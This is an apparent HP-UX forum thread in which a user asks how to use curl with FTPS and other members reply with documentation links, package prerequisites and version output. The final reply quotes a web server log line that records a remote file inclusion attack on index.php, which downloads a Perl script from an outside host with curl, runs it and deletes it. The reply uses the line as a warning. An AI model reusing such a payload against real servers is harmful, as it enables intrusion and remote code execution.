1833873 Members
1884 Online
110063 Solutions
New Discussion

Re: anyone using curl?

 
wvsa
Regular Advisor

anyone using curl?

Greetings;

Anyone out there using curl? If so could would you mind providing some examples as to how to use curl with ftps?

Thank you in advance!

wvsa
5 REPLIES 5
harry d brown jr
Honored Contributor

Re: anyone using curl?

 
Live Free or Die
harry d brown jr
Honored Contributor

Re: anyone using curl?

try this for documentation
http://curl.haxx.se/mail/archive-2003-12/0005.html

live free or die
harry d brown jr
Live Free or Die
Steven E. Protter
Exalted Contributor

Re: anyone using curl?

Shalom,

Any standard curl command, for example the ones given on RedHat's site to download iso's will work with an HP-UX curl port.

I hope this is not the same location for curl as Harry's if so, sorry, I'm typing fast:
http://hpux.connect.org.uk/hppd/hpux/Networking/WWW/curl-7.15.3/

curl should be part of HP's Internet Express port.
http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXIEXP1111

I recommned using Internet Express over the Porting and Archive Center because HP has actually done decent quality assurance testing on the port.

SEP
Steven E Protter
Owner of ISN Corporation
http://isnamerica.com
http://hpuxconsulting.com
Sponsor: http://hpux.ws
Twitter: http://twitter.com/hpuxlinux
Founder http://newdatacloud.com
VK2COT
Honored Contributor

Re: anyone using curl?

Hello,

a) Number of my clients at HP use it.

Last week, I installed it for a large
beer and vine company on HP-UX servers
here in Australia.

b) Note the following pre-requsistes:

libidn-0.5.20-hppa-11.11.depot
libgcc-4.1.0-hppa-11.11.depot
gettext-0.14.5-hppa-11.11.depot
libiconv-1.10-hppa-11.11.depot
openssl-0.9.8a-hppa-11.11.depot
zlib-1.2.3-hppa-11.11.depot
curl-7.15.3-hppa-11.11.depot

c) Otherwise, the bundles install perfectly well:

# curl -V
curl 7.15.3 (hppa2.0w-hp-hpux11.11) libcurl/7.15.3 OpenSSL/0.9.8a zlib/1.2.3 libidn/0.5.20
Protocols: tftp ftp telnet dict ldap http file https ftps
Features: IDN Largefile NTLM SSL libz

VK2COT
VK2COT - Dusan Baljevic
Geoff Wild
Honored Contributor

Re: anyone using curl?

Hackers use it (and wget):

196.22.136.110 - - [09/Apr/2006:23:48:11 -0700] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://erod11.tripod.com/tool.gif?&cmd=cd%20/tmp/;curl%20-O%20http://erod11.tripod.com/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 200 16

If you run a webserver - I would move it (and wget) to a non default PATH.

Rgds...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.